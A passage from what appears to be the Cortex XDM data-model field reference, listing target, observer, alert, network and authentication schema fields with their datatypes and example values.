Description ID of the container that is running the target process.

Datatype String

Dataclass Scalar

xdm.target.application

The target application.

xdm.target.application.name

Description The name of the target application.

Datatype String

Dataclass Scalar

xdm.target.application.version

Description The version of the target application.

Datatype String

Dataclass Scalar

xdm.target.application.publisher

Description The publisher (vendor/company) of the target application.

Datatype String

Dataclass Scalar
xdm.target.application.installation_timestamp

Description The installation time of the target application.

Datatype String

Dataclass Scalar

xdm.target.application.from_appstore

Description Whether the target application was installed from an application store.

Datatype Boolean

Dataclass Scalar

xdm.target.ipv4

Description The target IPv4 address of the activity.

Datatype IPv4

Dataclass Scalar

xdm.target.ipv6

Description The target IPv6 address of the activity.

Datatype IPv6

Dataclass Scalar

xdm.target.asn

The target IP address.

xdm.target.asn.as_number

Description The autonomous system number (ASN) of the target IP address (auto-enriched field).

Datatype Number

Dataclass Scalar

Examples 54538

Enriched True

xdm.target.asn.as_name

Description The autonomous system name of the target IP address (auto-enriched field).

Datatype String

Dataclass Scalar

Examples PALO ALTO NETWORKS

Enriched True

xdm.target.asn.isp

Description The autonomous system ISP name of the target IP address.

Datatype String

Dataclass Scalar

xdm.target.asn.domain

Description The autonomous system domain name of the target IP address

Datatype String

Dataclass Scalar

xdm.target.asn.is_proxy

Description Indicates whether or not the the autonomous system of the target IP address is a proxy/VPN address (auto-enriched field).

Datatype Boolean

Dataclass Scalar

Enriched True

xdm.target.is_internal_ip
 Description Whether the target IP address is internal (auto-enriched field).

Datatype Boolean

Dataclass Scalar

Enriched True

xdm.target.port

Description The target port.

Datatype Number

Dataclass Scalar

xdm.target.sent_bytes

Description The amount of bytes transmitted back by the target host.

Datatype Number

Dataclass Scalar

xdm.target.sent_packets

Description The amount of packets transmitted back by the target host.

Datatype Number

Dataclass Scalar

xdm.target.interface

Description The target interface address (usually the MAC address).

Datatype String

Dataclass Scalar

xdm.target.zone

Description The region/zone of the target host.

Datatype String

Dataclass Scalar

xdm.target.subnet

Description The subnet of the target IP address, in CIDR notation.

Datatype String

Dataclass Scalar

Examples 198.51.100.0/22, 2001:db8::/48

xdm.target.vlan

Description The VLAN of the target host.

Datatype Number

Dataclass Scalar

xdm.target.cloud

cloud specific information

xdm.target.cloud.provider

Description The cloud provider.

Datatype XDM_CONST.CLOUD_PROVIDER

Dataclass Scalar

Examples XDM_CONST.CLOUD_PROVIDER_AWS, XDM_CONST.CLOUD_PROVIDER_GCP, XDM_CONST.CLOUD_PROVIDER_AZURE, XDM_CONST.CLOUD_PROVIDER_ALIBABA, XDM_CONST.CLOUD_PROVIDER_ON_PREM

xdm.target.cloud.geo_region

Description The cloud provider's cloud geo region name.

Datatype String
 Dataclass Scalar

Examples APAC, NORTH_AMERICA, EUROPE

xdm.target.cloud.region

Description The cloud provider's cloud region name.

Datatype String

Dataclass Scalar

Examples us-east-2, eu-west-2, me-south-1

xdm.target.cloud.zone

Description The cloud zone/sub region within a certain region in the cloud provider.

Datatype String

Dataclass Scalar

Examples us-east-1a

xdm.target.cloud.project

Description The project name in which the log was reported.

Datatype String

Dataclass Scalar

xdm.target.cloud.project_hierarchy

Description The project's parent folders / organization unit.

Datatype String

Dataclass Array

Examples ['Palo Alto Networks', 'Cortex Analytics', 'dev']

xdm.target.cloud.project_id

Description The project id in which the log was reported.

Datatype String

Dataclass Scalar

xdm.target.module

The target module (loaded, unloaded, etc.).

xdm.target.module.filename

Description The file name of the target module (loaded, unloaded, etc.).

Datatype String

Dataclass Scalar

xdm.target.module.path

Description The file path of the target module (loaded, unloaded, etc.).

Datatype String

Dataclass Scalar

xdm.target.module.directory

Description The file directory of the target module (loaded, unloaded, etc.).

Datatype String

Dataclass Scalar

xdm.target.module.extension

Description The file extension of the target module (loaded, unloaded, etc.).

Datatype String

Dataclass Scalar

xdm.target.module.file_type
 Description The file type of the target module (loaded, unloaded, etc.).

Datatype String

Dataclass Scalar

xdm.target.module.md5

Description The MD5 hash signature for the target module (loaded, unloaded, etc.) content.

Datatype MD5

Dataclass Scalar

xdm.target.module.sha256

Description The SHA256 hash signature for the target module (loaded, unloaded, etc.) content.

Datatype SHA256

Dataclass Scalar

xdm.target.module.is_signed

Description Whether the loaded module of the target module (loaded, unloaded, etc.) is signed.

Datatype Boolean

Dataclass Scalar

Examples True

xdm.target.module.signer

Description The signer of the target module (loaded, unloaded, etc.).

Datatype String

Dataclass Scalar

Examples Microsoft Corporation

xdm.target.module.signature_status

Description The signature status of the target module (loaded, unloaded, etc.).

Datatype XDM_CONST.SIGNATURE_STATUS

Dataclass Scalar

Examples XDM_CONST.SIGNATURE_STATUS_UNSIGNED, XDM_CONST.SIGNATURE_STATUS_SIGNED_INVALID, XDM_CONST.SIGNATURE_STATUS_SIGNED_VERIFIED, XDM_CONST.SIGNATURE_STATUS_STATUS_UNKNOWN

xdm.target.module.size

Description Size in bytes of the target module (loaded, unloaded, etc.).

Datatype Number

Dataclass Scalar

xdm.target.registry

A registry contains information, settings, options, and other values for programs and hardware installed on all versions of Microsoft Windows operating systems.

xdm.target.registry.key

Description The registry key that is associated with the operation, normalized to standard root key naming conventions.

Datatype String

Dataclass Scalar

Examples HKEY_LOCAL_MACHINE\SOFTWARE\MTG

xdm.target.registry.value

Description The registry value that is associated with the operation. Registry values are similar to files in file systems.

Datatype String

Dataclass Scalar

xdm.target.registry.value_type

Description The registry value type.

Datatype XDM_CONST.REGISTRY_VALUE_TYPE
 Dataclass Scalar

Examples XDM_CONST.REGISTRY_VALUE_TYPE_REG_BINARY, XDM_CONST.REGISTRY_VALUE_TYPE_REG_DWORD, XDM_CONST.REGISTRY_VALUE_TYPE_REG_DWORD_LITTLE_ENDIAN, XDM_CONST.REGISTRY_VALUE_TYPE_REG_DWORD_BIG_ENDIAN,

XDM_CONST.REGISTRY_VALUE_TYPE_REG_EXPAND_SZ

xdm.target.registry.data

Description The data stored in the registry value.

Datatype String

Dataclass Scalar

Examples C:\Windows\system32;C:\Windows;

xdm.target.registry_before

before the action.

xdm.target.registry_before.key

Description The registry key before the action that is associated with the operation, normalized to standard root key naming conventions.

Datatype String

Dataclass Scalar

Examples HKEY_LOCAL_MACHINE\SOFTWARE\MTG

xdm.target.registry_before.value

Description The registry value before the action that is associated with the operation. Registry values are similar to files in file systems.

Datatype String

Dataclass Scalar

xdm.target.registry_before.value_type

Description The registry value type before the action.

Datatype XDM_CONST.REGISTRY_VALUE_TYPE

Dataclass Scalar

Examples XDM_CONST.REGISTRY_VALUE_TYPE_REG_BINARY, XDM_CONST.REGISTRY_VALUE_TYPE_REG_DWORD, XDM_CONST.REGISTRY_VALUE_TYPE_REG_DWORD_LITTLE_ENDIAN, XDM_CONST.REGISTRY_VALUE_TYPE_REG_DWORD_BIG_ENDIAN,

XDM_CONST.REGISTRY_VALUE_TYPE_REG_EXPAND_SZ

xdm.target.registry_before.data

Description The data stored in the registry value before the action.

Datatype String

Dataclass Scalar

Examples C:\Windows\system32;C:\Windows;

xdm.target.file

The file that has been created, modified, or deleted.

xdm.target.file.filename

Description The file name of the file that has been created, modified, or deleted.

Datatype String

Dataclass Scalar

xdm.target.file.path

Description The file path of the file that has been created, modified, or deleted.

Datatype String

Dataclass Scalar

xdm.target.file.directory

Description The file directory of the file that has been created, modified, or deleted.

Datatype String

Dataclass Scalar

xdm.target.file.extension

Description The file extension of the file that has been created, modified, or deleted.
 Datatype String

Dataclass Scalar

xdm.target.file.file_type

Description The file type of the file that has been created, modified, or deleted.

Datatype String

Dataclass Scalar

xdm.target.file.md5

Description The MD5 hash signature for the file that has been created, modified, or deleted content.

Datatype MD5

Dataclass Scalar

xdm.target.file.sha256

Description The SHA256 hash signature for the file that has been created, modified, or deleted content.

Datatype SHA256

Dataclass Scalar

xdm.target.file.is_signed

Description Whether the loaded module of the file that has been created, modified, or deleted is signed.

Datatype Boolean

Dataclass Scalar

Examples True

xdm.target.file.signer

Description The signer of the file that has been created, modified, or deleted.

Datatype String

Dataclass Scalar

Examples Microsoft Corporation

xdm.target.file.signature_status

Description The signature status of the file that has been created, modified, or deleted.

Datatype XDM_CONST.SIGNATURE_STATUS

Dataclass Scalar

Examples XDM_CONST.SIGNATURE_STATUS_UNSIGNED, XDM_CONST.SIGNATURE_STATUS_SIGNED_INVALID, XDM_CONST.SIGNATURE_STATUS_SIGNED_VERIFIED, XDM_CONST.SIGNATURE_STATUS_STATUS_UNKNOWN

xdm.target.file.size

Description Size in bytes of the file that has been created, modified, or deleted.

Datatype Number

Dataclass Scalar

xdm.target.file_before

The file before the action.

xdm.target.file_before.filename

Description The file name of the file before the action.

Datatype String

Dataclass Scalar

xdm.target.file_before.path

Description The file path of the file before the action.

Datatype String

Dataclass Scalar

xdm.target.file_before.directory
 Description The file directory of the file before the action.

Datatype String

Dataclass Scalar

xdm.target.file_before.extension

Description The file extension of the file before the action.

Datatype String

Dataclass Scalar

xdm.target.file_before.file_type

Description The file type of the file before the action.

Datatype String

Dataclass Scalar

xdm.target.file_before.md5

Description The MD5 hash signature for the file before the action content.

Datatype MD5

Dataclass Scalar

xdm.target.file_before.sha256

Description The SHA256 hash signature for the file before the action content.

Datatype SHA256

Dataclass Scalar

xdm.target.file_before.is_signed

Description Whether the loaded module of the file before the action is signed.

Datatype Boolean

Dataclass Scalar

Examples True

xdm.target.file_before.signer

Description The signer of the file before the action.

Datatype String

Dataclass Scalar

Examples Microsoft Corporation

xdm.target.file_before.signature_status

Description The signature status of the file before the action.

Datatype XDM_CONST.SIGNATURE_STATUS

Dataclass Scalar

Examples XDM_CONST.SIGNATURE_STATUS_UNSIGNED, XDM_CONST.SIGNATURE_STATUS_SIGNED_INVALID, XDM_CONST.SIGNATURE_STATUS_SIGNED_VERIFIED, XDM_CONST.SIGNATURE_STATUS_STATUS_UNKNOWN

xdm.target.file_before.size

Description Size in bytes of the file before the action.

Datatype Number

Dataclass Scalar

xdm.target.domain

Description The domain that the client tried to access.

Datatype String

Dataclass Scalar

xdm.target.url
 Description The URL that the client tried to access.

Datatype String

Dataclass Scalar

xdm.target.resource

A resource that is being audited.

xdm.target.resource.id

Description The resource ID.

Datatype String

Dataclass Scalar

xdm.target.resource.name

Description The resource name.

Datatype String

Dataclass Scalar

xdm.target.resource.parent_id

Description The ID of the owner of the audited resource.

Datatype String

Dataclass Scalar

xdm.target.resource.type

Description The resource type.

Datatype String

Dataclass Scalar

xdm.target.resource.sub_type

Description The resource subtype.

Datatype String

Dataclass Scalar

xdm.target.resource.value

Description The value of the audited resource.

Datatype String

Dataclass Scalar

xdm.target.resource_before

before the activity.

xdm.target.resource_before.id

Description The resource ID before the activity.

Datatype String

Dataclass Scalar

xdm.target.resource_before.name

Description The resource name before the activity.

Datatype String

Dataclass Scalar

xdm.target.resource_before.parent_id

Description The ID of the owner of the audited resource before the activity.

Datatype String

Dataclass Scalar

xdm.target.resource_before.type
 Description The resource type before the activity.

Datatype String

Dataclass Scalar

xdm.target.resource_before.sub_type

Description The resource subtype before the activity.

Datatype String

Dataclass Scalar

xdm.target.resource_before.value

Description The value of the audited resource before the activity.

Datatype String

Dataclass Scalar

5.6 | xdm.observer
The device, agent, or data provider that observed and reported the event.

xdm.observer.vendor

Description The vendor of the observing device/agent (auto-enriched field).

Datatype String

Dataclass Scalar

Enriched True

xdm.observer.product

Description The product name of the observing device/agent (auto-enriched field).

Datatype String

Dataclass Scalar

Enriched True

xdm.observer.type

Description The type of the observing device/agent.

Datatype String

Dataclass Scalar

xdm.observer.version

Description The version of the observing device/agent.

Datatype String

Dataclass Scalar

xdm.observer.content_version

Description The content version of the observing device/agent.

Datatype String

Dataclass Scalar

xdm.observer.unique_identifier

Description The unique identifier of the observing device/agent.

Datatype String

Dataclass Scalar

xdm.observer.name

Description The name of the observing device. Can be a host name, domain name, etc.

Datatype String

Dataclass Scalar
xdm.observer.action

Description The action that the observer performed related to the activity.

Datatype String

Dataclass Scalar

5.7 | xdm.alert
A potential threat or alert

xdm.alert.category

Description The threat category. Use https://docs.paloaltonetworks.com/pan-os/10-2/pan-os-admin/threat-prevention/threat-signatures.html for standardization

Datatype XDM_CONST.THREAT_CATEGORY

Dataclass Scalar

Examples XDM_CONST.THREAT_CATEGORY_APK, XDM_CONST.THREAT_CATEGORY_DMG, XDM_CONST.THREAT_CATEGORY_FLASH, XDM_CONST.THREAT_CATEGORY_JAVA_CLASS, XDM_CONST.THREAT_CATEGORY_MACHO

xdm.alert.subcategory

Description The threat subcategory.

Datatype String

Dataclass Scalar

xdm.alert.severity

Description The severity of the threat.

Datatype String

Dataclass Scalar

xdm.alert.name

Description The name of the threat.

Datatype String

Dataclass Scalar

xdm.alert.description

Description The description of the threat.

Datatype String

Dataclass Scalar

xdm.alert.mitre_tactics

Description The threat tactics represent the 'why' of an ATT&CK technique or sub-technique. It is the adversary's tactical goal: the reason for performing an action.

Datatype XDM_CONST.MITRE_TACTIC

Dataclass Array

Examples XDM_CONST.MITRE_TACTIC_COLLECTION, XDM_CONST.MITRE_TACTIC_COMMAND_AND_CONTROL, XDM_CONST.MITRE_TACTIC_CREDENTIAL_ACCESS, XDM_CONST.MITRE_TACTIC_DEFENSE_EVASION, XDM_CONST.MITRE_TACTIC_DISCOVERY

xdm.alert.mitre_techniques

Description The threat techniques represent 'how' an adversary achieves a tactical goal by performing an action. For example, an adversary may dump credentials to achieve credential access.

Datatype XDM_CONST.MITRE_TECHNIQUE

Dataclass Array

Examples XDM_CONST.MITRE_TECHNIQUE_ABUSE_ELEVATION_CONTROL_MECHANISM, XDM_CONST.MITRE_TECHNIQUE_ABUSE_ELEVATION_CONTROL_MECHANISM_BYPASS_USER_ACCOUNT_CONTROL,

XDM_CONST.MITRE_TECHNIQUE_ABUSE_ELEVATION_CONTROL_MECHANISM_ELEVATED_EXECUTION_WITH_PROMPT, XDM_CONST.MITRE_TECHNIQUE_ABUSE_ELEVATION_CONTROL_MECHANISM_SETUID_AND_SETGID,
XDM_CONST.MITRE_TECHNIQUE_ABUSE_ELEVATION_CONTROL_MECHANISM_SUDO_AND_SUDO_CACHING

xdm.alert.original_threat_id

Description The threat ID as received from the source.

Datatype String

Dataclass Scalar

xdm.alert.original_threat_name
 Description The threat's name as received from the source.

Datatype String

Dataclass Scalar

xdm.alert.original_alert_id

Description The specific alert ID, the instance of the threat, as received from the source.

Datatype String

Dataclass Scalar

xdm.alert.risks

Description A collection of potential risks, vulnerabilities, or suspicions that are associated with this alert or event.

Datatype String

Dataclass Array

5.8 | xdm.network
Event fields used to define metadata about network information seen in a typical OSI layer. This includes data from network monitoring device/application (NSM, Firewall, IPS, IDS, etc); cloud NetFlow; and network information from endpoints.

xdm.network.session_id

Description Session ID.

Datatype String

Dataclass Scalar

xdm.network.ip_protocol

Description The transport layer in the OSI model. Also known as IP Protocol.

Datatype XDM_CONST.IP_PROTOCOL

Dataclass Scalar

Examples XDM_CONST.IP_PROTOCOL_HOPOPT, XDM_CONST.IP_PROTOCOL_ICMP, XDM_CONST.IP_PROTOCOL_IGMP, XDM_CONST.IP_PROTOCOL_GGP, XDM_CONST.IP_PROTOCOL_IP

xdm.network.protocol_layers

Description The network protocols arranged by layers where the highest layer is last. For example, [IP, TCP, TLS, HTTP, INSTAGRAM].

Datatype String

Dataclass Array

xdm.network.application_protocol

Description Layer 7 (application) in the OSI model. Use https://applipedia.paloaltonetworks.com/ for app standardization.

Datatype String

Dataclass Scalar

xdm.network.application_protocol_category

Description The category of the Layer 7 (application) protocol. Use https://applipedia.paloaltonetworks.com/ for app standardization.

Datatype String

Dataclass Scalar

xdm.network.application_protocol_subcategory

Description The subcategory of the Layer 7 (application) protocol. Use https://applipedia.paloaltonetworks.com/ for app standardization.

Datatype String

Dataclass Scalar

xdm.network.rule

Description The name or ID of the rule by which the observer decided to act.

Datatype String

Dataclass Scalar

xdm.network.icmp
Internet Control Message Protocol (ICMP) specific fields.

xdm.network.icmp.type

Description The ICMP type.

Datatype Number

Dataclass Scalar

xdm.network.icmp.code

Description The ICMP code.

Datatype Number

Dataclass Scalar

xdm.network.dhcp

Dynamic Host Configuration Protocol (DHCP) specific fields.

xdm.network.dhcp.ciaddr

Description The client IP address.

Datatype IPv4

Dataclass Scalar

xdm.network.dhcp.yiaddr

Description Your IP address.

Datatype IPv4

Dataclass Scalar

xdm.network.dhcp.siaddr

Description The IP address of the next bootstrap server.

Datatype IPv4

Dataclass Scalar

xdm.network.dhcp.giaddr

Description The relay agent IP address.

Datatype IPv4

Dataclass Scalar

xdm.network.dhcp.chaddr

Description The client hardware address.

Datatype String

Dataclass Scalar

xdm.network.dhcp.sname

Description The server name from which the client wishes to boot.

Datatype String

Dataclass Scalar

xdm.network.dhcp.message_type

Description The DHCP message type.

Datatype XDM_CONST.DHCP_MESSAGE_TYPE

Dataclass Scalar

Examples XDM_CONST.DHCP_MESSAGE_TYPE_DHCPDISCOVER, XDM_CONST.DHCP_MESSAGE_TYPE_DHCPOFFER, XDM_CONST.DHCP_MESSAGE_TYPE_DHCPREQUEST, XDM_CONST.DHCP_MESSAGE_TYPE_DHCPDECLINE, XDM_CONST.DHCP_MESSAGE_TYPE_DHCPACK

xdm.network.dhcp.lease

Description The lease time in seconds. See RFC2132, section 9.2.

Datatype Number

Dataclass Scalar

xdm.network.dhcp.client_hostname
 Description The client hostname. See RFC2132, section 3.14.

Datatype String

Dataclass Scalar

xdm.network.dhcp.requested_address

Description The requested IP address. See RFC2132, section 9.1.

Datatype String

Dataclass Scalar

xdm.network.dhcp.dns_server

Description The domain name server. DHCP option 6, See RFC2132.

Datatype String

Dataclass Array

xdm.network.dhcp.wins_server

Description The NetBIOS name server. DHCP option 44. See RFC2132.

Datatype String

Dataclass Array

xdm.network.dns

Domain Name System (DNS) specific fields.

xdm.network.dns.is_response

Description Whether the event is a DNS response. See QR field from RFC1035.

Datatype Boolean

Dataclass Scalar

xdm.network.dns.opcode

Description The DNS OpCode used to specify the type of DNS query (e.g. QUERY, IQUERY, STATUS, etc.).

Datatype Number

Dataclass Scalar

xdm.network.dns.authoritative

Description Other DNS header flags. See RFC1035, section 4.1.1.

Datatype Boolean

Dataclass Scalar

xdm.network.dns.is_truncated

Description Whether the DNS response is truncated.

Datatype Boolean

Dataclass Scalar

xdm.network.dns.response_code

Description Response code. See RCODE from RFC1035.

Datatype XDM_CONST.DNS_RESPONSE_CODE

Dataclass Scalar

Examples XDM_CONST.DNS_RESPONSE_CODE_NO_ERROR, XDM_CONST.DNS_RESPONSE_CODE_FORMAT_ERROR, XDM_CONST.DNS_RESPONSE_CODE_SERVER_FAILURE, XDM_CONST.DNS_RESPONSE_CODE_NON_EXISTENT_DOMAIN,

XDM_CONST.DNS_RESPONSE_CODE_NOT_IMPLEMENTED

xdm.network.dns.dns_question

A DNS query is a demand for information sent from a user'scomputer (DNS client) to a DNS server.

xdm.network.dns.dns_question.name

Description The domain name.

Datatype String

Dataclass Scalar

xdm.network.dns.dns_question.type
 Description The code specifying the type of query.

Datatype XDM_CONST.DNS_RECORD_TYPE

Dataclass Scalar

Examples XDM_CONST.DNS_RECORD_TYPE_A, XDM_CONST.DNS_RECORD_TYPE_AAAA, XDM_CONST.DNS_RECORD_TYPE_AFSDB, XDM_CONST.DNS_RECORD_TYPE_APL, XDM_CONST.DNS_RECORD_TYPE_CAA

xdm.network.dns.dns_question.class

Description The code specifying the class of the query.

Datatype Number

Dataclass Scalar

xdm.network.dns.dns_resource_record

A resource record, commonly referred to as an RR,is the unit of information entry in DNS zone files; RRs are the basic building blocks ofhost name and IP information and are used to resolve all DNS queries. Resource records comein a fairly wide variety of types in order to provide extended name-resolution services.

xdm.network.dns.dns_resource_record.name

Description The domain name.

Datatype String

Dataclass Scalar

xdm.network.dns.dns_resource_record.type

Description The code specifying the type of query.

Datatype XDM_CONST.DNS_RECORD_TYPE

Dataclass Scalar

Examples XDM_CONST.DNS_RECORD_TYPE_A, XDM_CONST.DNS_RECORD_TYPE_AAAA, XDM_CONST.DNS_RECORD_TYPE_AFSDB, XDM_CONST.DNS_RECORD_TYPE_APL, XDM_CONST.DNS_RECORD_TYPE_CAA

xdm.network.dns.dns_resource_record.class

Description The code specifying the class of the query.

Datatype Number

Dataclass Scalar

xdm.network.dns.dns_resource_record.value

Description The payload or response to the DNS question.

Datatype String

Dataclass Scalar

xdm.network.http

Hypertext Transfer Protocol (HTTP) specific fields.

xdm.network.http.referrer

Description The HTTP request referrer address.

Datatype String

Dataclass Scalar

xdm.network.http.url

Description The URL address of this HTTP request.

Datatype String

Dataclass Scalar

xdm.network.http.url_category

Description The URL category. See https://knowledgebase.paloaltonetworks.com/KCSArticleDetail?id=kA10g000000Cm5hCAC

Datatype XDM_CONST.URL_CATEGORY

Dataclass Scalar

Examples XDM_CONST.URL_CATEGORY_ABORTION, XDM_CONST.URL_CATEGORY_ABUSED_DRUGS, XDM_CONST.URL_CATEGORY_ADULT, XDM_CONST.URL_CATEGORY_ALCOHOL_AND_TOBACCO, XDM_CONST.URL_CATEGORY_AUCTIONS

xdm.network.http.domain

Description The domain this HTTP request is accessing.

Datatype String
 Dataclass Scalar

xdm.network.http.content_type

Description The content type of this HTTP request.

Datatype String

Dataclass Scalar

Examples application/json

xdm.network.http.browser

Description The browser from which the HTTP request originated.

Datatype String

Dataclass Scalar

xdm.network.http.tld

Description The top level domain that this HTTP request is accessing.

Datatype String

Dataclass Scalar

xdm.network.http.method

Description The HTTP method that this request is using.

Datatype XDM_CONST.HTTP_METHOD

Dataclass Scalar

Examples XDM_CONST.HTTP_METHOD_ACL, XDM_CONST.HTTP_METHOD_BASELINE_CONTROL, XDM_CONST.HTTP_METHOD_BIND, XDM_CONST.HTTP_METHOD_CHECKIN, XDM_CONST.HTTP_METHOD_CHECKOUT

xdm.network.http.response_code

Description The HTTP request response code.

Datatype XDM_CONST.HTTP_RSP_CODE

Dataclass Scalar

Examples XDM_CONST.HTTP_RSP_CODE_CONTINUE, XDM_CONST.HTTP_RSP_CODE_SWITCHING_PROTOCOLS, XDM_CONST.HTTP_RSP_CODE_PROCESSING, XDM_CONST.HTTP_RSP_CODE_EARLY_HINTS, XDM_CONST.HTTP_RSP_CODE_OK

xdm.network.http.http_header

An HTTP header.

xdm.network.http.http_header.header

Description The HTTP header name.

Datatype String

Dataclass Scalar

xdm.network.http.http_header.value

Description The HTTP header value.

Datatype String

Dataclass Scalar

xdm.network.tls

Transport Layer Security (TLS) specific fields.

xdm.network.tls.client_certificate

The client certificate.

xdm.network.tls.client_certificate.version

Description The version of the client certificate.

Datatype String

Dataclass Scalar

xdm.network.tls.client_certificate.subject

Description The subject of the client certificate.

Datatype String
 Dataclass Scalar

xdm.network.tls.client_certificate.issuer

Description The issuer of the client certificate.

Datatype String

Dataclass Scalar

xdm.network.tls.client_certificate.serial

Description Unique identifier assigned to the certificate when it is issued. Used to distinguish the certificate from other certificates issued by the same certificate authority. The serial number is usually a positive integer encoded as an ASN.1 INTEGER value.

Datatype String

Dataclass Scalar

Examples 10:e6:fc:62:b7:41:8a:d5:00:5e:45:b6

xdm.network.tls.client_certificate.md5

Description The MD5 hash of the client certificate.

Datatype MD5

Dataclass Scalar

xdm.network.tls.client_certificate.sha256

Description The SHA256 hash of the client certificate.

Datatype SHA256

Dataclass Scalar

xdm.network.tls.client_certificate.not_before

Description Indicates when the client certificate is first valid.

Datatype Timestamp

Dataclass Scalar

xdm.network.tls.client_certificate.not_after

Description Indicates when the client certificate is no longer valid.

Datatype Timestamp

Dataclass Scalar

xdm.network.tls.client_certificate.algorithm

Description The algorithm of the client certificate.

Datatype String

Dataclass Scalar

Examples MD5withRSA, SHA1withRSA, SHA256withRSA, SHA256withECDSA

xdm.network.tls.client_ja3

Description The JA3 hash from the Client Hello packet.

Datatype String

Dataclass Scalar

xdm.network.tls.server_name

Description The host name of the server to which the client is connecting.

Datatype String

Dataclass Scalar

xdm.network.tls.server_certificate

The server certificate.

xdm.network.tls.server_certificate.version

Description The version of the server certificate.

Datatype String
 Dataclass Scalar

xdm.network.tls.server_certificate.subject

Description The subject of the server certificate.

Datatype String

Dataclass Scalar

xdm.network.tls.server_certificate.issuer

Description The issuer of the server certificate.

Datatype String

Dataclass Scalar

xdm.network.tls.server_certificate.serial

Description Unique identifier assigned to the certificate when it is issued. Used to distinguish the certificate from other certificates issued by the same certificate authority. The serial number is usually a positive integer encoded as an ASN.1 INTEGER value.

Datatype String

Dataclass Scalar

Examples 10:e6:fc:62:b7:41:8a:d5:00:5e:45:b6

xdm.network.tls.server_certificate.md5

Description The MD5 hash of the server certificate.

Datatype MD5

Dataclass Scalar

xdm.network.tls.server_certificate.sha256

Description The SHA256 hash of the server certificate.

Datatype SHA256

Dataclass Scalar

xdm.network.tls.server_certificate.not_before

Description Indicates when the server certificate is first valid.

Datatype Timestamp

Dataclass Scalar

xdm.network.tls.server_certificate.not_after

Description Indicates when the server certificate is no longer valid.

Datatype Timestamp

Dataclass Scalar

xdm.network.tls.server_certificate.algorithm

Description The algorithm of the server certificate.

Datatype String

Dataclass Scalar

Examples MD5withRSA, SHA1withRSA, SHA256withRSA, SHA256withECDSA

xdm.network.tls.server_ja3

Description The JA3 hash from Server Hello packet.

Datatype String

Dataclass Scalar

xdm.network.tls.cipher

Description The Cipher used during the connection.

Datatype String

Dataclass Scalar

xdm.network.tls.protocol_version
 Description The TLS version.

Datatype String

Dataclass Scalar

xdm.network.dcerpc

DCE/RPC (Distributed Computing Environment/Remote Procedure Calls) specific fields

xdm.network.dcerpc.operation

Description The RPC operation used. A combination of UUID and OpNum.

Datatype XDM_CONST.DCERPC_OPERATION

Dataclass Scalar

Examples XDM_CONST.DCERPC_OPERATION_NETR_JOB_ADD, XDM_CONST.DCERPC_OPERATION_SERVER_ALIVE, XDM_CONST.DCERPC_OPERATION_GET_OBJECT

xdm.network.dcerpc.interface_uuid

Description The UUID of the RPC interface used.

Datatype String

Dataclass Scalar

xdm.network.dcerpc.opnum

Description The RPC operation number used.

Datatype Number

Dataclass Scalar

xdm.network.dcerpc.svcctl_buffer

Description The buffer sent via SMB svcctl MSRPC Interface.

Datatype String

Dataclass Scalar

xdm.network.ldap

LDAP (Lightweight Directory Access Protocol) specific fields.

xdm.network.ldap.operation

Description The LDAP operation type.

Datatype XDM_CONST.LDAP_OPERATION

Dataclass Scalar

Examples XDM_CONST.LDAP_OPERATION_BIND_REQUEST, XDM_CONST.LDAP_OPERATION_BIND_RESPONSE, XDM_CONST.LDAP_OPERATION_UNBIND_REQUEST, XDM_CONST.LDAP_OPERATION_SEARCH_REQUEST, XDM_CONST.LDAP_OPERATION_SEARCH_RESULT_ENTRY

xdm.network.ldap.scope

Description The search scope in which this operation is performed.

Datatype XDM_CONST.LDAP_SCOPE

Dataclass Scalar

Examples XDM_CONST.LDAP_SCOPE_BASE_OBJECT, XDM_CONST.LDAP_SCOPE_SINGLE_LEVEL, XDM_CONST.LDAP_SCOPE_WHOLE_SUBTREE

xdm.network.ldap.filter

Description The filter defining the criteria used to identify entries in search requests.

Datatype String

Dataclass Scalar

xdm.network.ldap.attributes

Description The search attributes related to the operation.

Datatype String

Dataclass Array

xdm.network.ldap.returned_entries

Description The number of result entries returned by the operation.

 Datatype Number

Dataclass Scalar

xdm.network.ldap.bind_auth_type

Description The authentication type used for the bind operation.

Datatype XDM_CONST.LDAP_BIND_AUTH_TYPE

Dataclass Scalar

Examples XDM_CONST.LDAP_BIND_AUTH_TYPE_SIMPLE, XDM_CONST.LDAP_BIND_AUTH_TYPE_SASL

xdm.network.vpn

VPN fields.

xdm.network.vpn.allocated_ipv4

Description The IPv4 address that is allocated to the source by the VPN server.

Datatype IPv4

Dataclass Scalar

xdm.network.vpn.allocated_ipv6

Description The IPv6 address that is allocated to the source by the VPN server.

Datatype IPv6

Dataclass Scalar

5.9 | xdm.auth
The Auth section is used for both authentication and authorization attempts, such as Kerberos, NTLM, Oauth2, Login, MFA, or SSO.In case of authentication/authorization over the network or from endpoint data, it is preferred to use the Auth section.

xdm.auth.service

Description The authentication service name.

Datatype String

Dataclass Scalar

xdm.auth.auth_method

Description The authentication method.

Datatype String

Dataclass Scalar

xdm.auth.privilege_level

Description The privilege level.

Datatype XDM_CONST.PRIVILEGE_LEVEL

Dataclass Scalar

Examples XDM_CONST.PRIVILEGE_LEVEL_GUEST, XDM_CONST.PRIVILEGE_LEVEL_USER, XDM_CONST.PRIVILEGE_LEVEL_ADMIN, XDM_CONST.PRIVILEGE_LEVEL_SYSTEM

xdm.auth.kerberos_tgt

Kerberos protocol specific fields.

xdm.auth.kerberos_tgt.msg_type

Description Kerberos 5 message type assigned numbers.

Datatype XDM_CONST.KERBEROS_MSG_TYPE

Dataclass Scalar

Examples XDM_CONST.KERBEROS_MSG_TYPE_AS_REQ, XDM_CONST.KERBEROS_MSG_TYPE_AS_REP, XDM_CONST.KERBEROS_MSG_TYPE_TGS_REQ, XDM_CONST.KERBEROS_MSG_TYPE_TGS_REP, XDM_CONST.KERBEROS_MSG_TYPE_AP_REQ

xdm.auth.kerberos_tgt.spn_type

Description The type of the requested service principal.

Datatype XDM_CONST.KERBEROS_PRINCIPAL_TYPE

Dataclass Scalar

Examples XDM_CONST.KERBEROS_PRINCIPAL_TYPE_UNKNOWN, XDM_CONST.KERBEROS_PRINCIPAL_TYPE_PRINCIPAL, XDM_CONST.KERBEROS_PRINCIPAL_TYPE_SRV_INST, XDM_CONST.KERBEROS_PRINCIPAL_TYPE_SRV_HST, XDM_CONST.KERBEROS_PRINCIPAL_TYPE_SRV_XHST

xdm.auth.kerberos_tgt.spn_values
 Description The service names being requested.

Datatype String

Dataclass Array

xdm.auth.kerberos_tgt.cname_type

